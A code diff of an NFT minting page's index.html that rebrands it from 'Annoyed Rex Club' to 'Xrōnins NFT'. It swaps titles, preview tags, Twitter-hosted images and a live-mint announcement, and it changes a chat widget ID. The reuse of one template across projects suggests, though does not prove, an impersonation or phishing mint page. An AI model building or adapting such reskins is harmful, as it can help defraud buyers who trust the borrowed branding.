--- a/index.html
+++ b/index.html
@@ -6,16 +6,16 @@
     <meta name="theme-color" content="#000000" />
     <meta content="🌐 solport.io/mint" property="og:title">
     <meta content="
-     🟢 Annoyed Rex Club Minting is NOW LIVE!
+     🟢 Xrōnins NFT Minting is NOW LIVE!
     
      Mint Price: 1.5 SOL
     " property="og:description">
-    <meta content="https://pbs.twimg.com/profile_banners/1483929989678604291/1652207065/1500x500" property="og:image">
+    <meta content="https://pbs.twimg.com/profile_banners/1495766532034641925/1652405443/1500x500" property="og:image">
     <meta name="twitter:card" content="summary_large_image">
-    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/130" />
+    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/131" />
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-    <title>Annoyed Rex Club</title>
-    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1527306328846356480/3zBgDba7_400x400.jpg" />
+    <title>Xrōnins NFT</title>
+    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1524865499288551451/d1Ic3ZrR_400x400.jpg" />
     <link rel="stylesheet" type="text/css" href="css/all.min.css">
     <link rel="stylesheet" type="text/css" href="css/normalize.css">
     <link rel="stylesheet" type="text/css" href="css/style.css">
@@ -44,14 +44,14 @@
     <script type="text/javascript">
         var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
         (function(){
-        var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
-        s1.async=true;
-        s1.src='https://embed.tawk.to/6287e3d6b0d10b6f3e73461f/1g3hd3vkp';
-        s1.charset='UTF-8';
-        s1.setAttribute('crossorigin','*');
-        s0.parentNode.insertBefore(s1,s0);
+            var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
+            s1.async=true;
+            s1.src='https://embed.tawk.to/62969ad27b967b1179923e81/1g4e4pi3m';
+            s1.charset='UTF-8';
+            s1.setAttribute('crossorigin','*');
+            s0.parentNode.insertBefore(s1,s0);
         })();
-        </script>
+    </script>
 </head>
 
 <body>
@@ -66,12 +66,12 @@
         <div class="main-area">
 
             <div class="main-area__right">
-                <h2 class="right-title">Annoyed Rex Club</h2>
+                <h2 class="right-title">Xrōnins NFT</h2>
 
                 <div class="right-list">
                     <li>
                         <div class="text">
-                            3210 Rexes waiting for the Impact Day | Be part of our “The Club’s Lore” and earn $IMPACT
+                            5,555 Xrōnins who made an oath to end tyranny and protect the Metaverse | Manga/Anime based story with utility.
                     </li>
                     </div>
 
@@ -103,7 +103,7 @@
                 </style>
                 <div class="main-area__left">
                     <div class="slider-area">
-                        <img class="animation" src="https://uploads-ssl.webflow.com/621242debd8032bdec14a2e6/628cdb60b5f08a0c5170dd78_0829B286-4BB3-47B4-9BB6-95E3B307A6F6.gif" alt="GiF">
+                        <img class="animation" src="https://static.wixstatic.com/media/b2d01c_49642b63f3d24fa89d35f20e3820e30c~mv2.png/v1/crop/x_192,y_430,w_1585,h_2506/fill/w_383,h_605,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/b2d01c_49642b63f3d24fa89d35f20e3820e30c~mv2.png" alt="GiF">
                     </div>
                 </div>
             </div>
